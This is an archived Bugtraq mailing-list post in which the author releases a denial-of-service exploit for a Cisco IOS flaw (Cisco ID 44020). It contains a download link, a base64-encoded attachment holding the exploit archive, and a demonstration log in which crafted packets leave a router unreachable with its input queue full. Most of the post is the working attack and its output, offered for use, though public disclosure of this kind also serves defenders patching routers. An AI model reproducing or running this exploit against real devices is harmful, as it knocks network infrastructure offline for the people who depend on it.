[30825] in bugtraq
Cisco IOS exploit (44020)
daemon@ATHENA.MIT.EDU (Martin Kluge)
Mon Jul 21 12:53:02 2003
Date: Mon, 21 Jul 2003 18:01:32 +0200
From: Martin Kluge <martin@elxsi.de>
To: bugtraq@securityfocus.com
Message-ID: <20030721160132.GA61689@elxsi.de>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="CUfgB8w4ZwR/yMy5"
Content-Disposition: inline
--CUfgB8w4ZwR/yMy5
Content-Type: multipart/mixed; boundary="tThc/1wpZn/ma/RB"
Content-Disposition: inline
--tThc/1wpZn/ma/RB
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Hi,
I'd like to submit a DoS attack against the recently found bug in
almost all Cisco IOS versions (Cisco document ID 44020).
The exploit can be found here (and it is included as attachment):
http://www.elxsi.de/cisco-bug-44020.tar.gz
This exploit is NOT broken (like the shadowchode.tar.gz exploit for example=
):
Example:
bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
Connected to 192.168.1.123.
Escape character is '^]'.
User Access Verification
Username: 103
Password: ******
1003>show version
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE=
(fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
Image text-base: 0x02004000, data-base: 0x0259733C
ROM: System Bootstrap, Version 5.3.2(9) [vatran 9], RELEASE SOFTWARE (fc1)
BOOTFLASH: 1000 Bootstrap Software (C1000-RBOOT-R), Version 10.3(9), RELEAS=
E SOFTWARE (fc1)
1003 uptime is 6 minutes
System restarted by power-on
System image file is "flash:c1000-bnsy56-mz.120-22.bin"
cisco 1000 (68360) processor (revision D) with 15872K/512K bytes of memory.
Processor board ID 03305903
Bridging software.
X.25 software, Version 3.0.0.
Basic Rate ISDN software, Version 1.1.
1 Ethernet/IEEE 802.3 interface(s)
1 ISDN Basic Rate interface(s)
7K bytes of non-volatile configuration memory.
bash-2.05b#./cisco-bug-44020 192.168.1.1 192.168.1.123 1 0
DEBUG: Hops: 1
DEBUG: Protocol: 53
DEBUG: Checksum: 47299
DEBUG: 45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 61909
DEBUG: 45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 55515
DEBUG: 45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 53
DEBUG: Checksum: 10618
DEBUG: 45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 77
DEBUG: Checksum: 40137
DEBUG: 45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
<snip>
=2E..
<snip>
bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
telnet: Unable to connect to remote host: No route to host
If I login via term, I can see the following:
Press RETURN to get started!
00:00:30: %LINK-3-UPDOWN: Interface Ethernet0, changed state to up
00:00:32: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet0, change=
d stp
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:1, changed s=
taten
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:2, changed s=
taten
00:00:39: %SYS-5-CONFIG_I: Configured from memory by console
00:00:39: %SYS-5-RESTART: System restarted --
Cisco Internetwork Operating System Software
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE=
(fc)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
00:00:40: %LINK-3-UPDOWN: Interface BRI0, changed state to up
1003>en
Password: ******
1003#show Interfaces Ethernet 0
Ethernet0 is up, line protocol is up
Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia 0060.7062.5727)
Internet address is 192.168.1.123/24
MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255
Encapsulation ARPA, loopback not set, keepalive set (10 sec)
ARP type: ARPA, ARP Timeout 04:00:00
Last input 00:02:04, output 00:00:04, output hang never
Last clearing of "show interface" counters never
Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0
^^
||
The input queue is full :)
Cheers,
Martin Kluge
--=20
Name : Martin Kluge
email : martin@elxsi.info
Phone : +49 160 1515182
Projects : http://www.aa-security.de
GPG Key : http://www.elxsi.de/key.pub
--tThc/1wpZn/ma/RB
Content-Type: application/x-tar-gz
Content-Disposition: attachment; filename="cisco-bug-44020.tar.gz"
Content-Transfer-Encoding: base64
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
UdndxgBQAAA=
--tThc/1wpZn/ma/RB--
--CUfgB8w4ZwR/yMy5
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)
iD8DBQE/HA5cSrvfVqGpUpcRAra7AJ49jWDqx5S2YDO9YRFpFt42YRGdWgCgoVw8
/gOxbX7h207fj0rQ2Co3A2U=
=JgnG
-----END PGP SIGNATURE-----
--CUfgB8w4ZwR/yMy5--
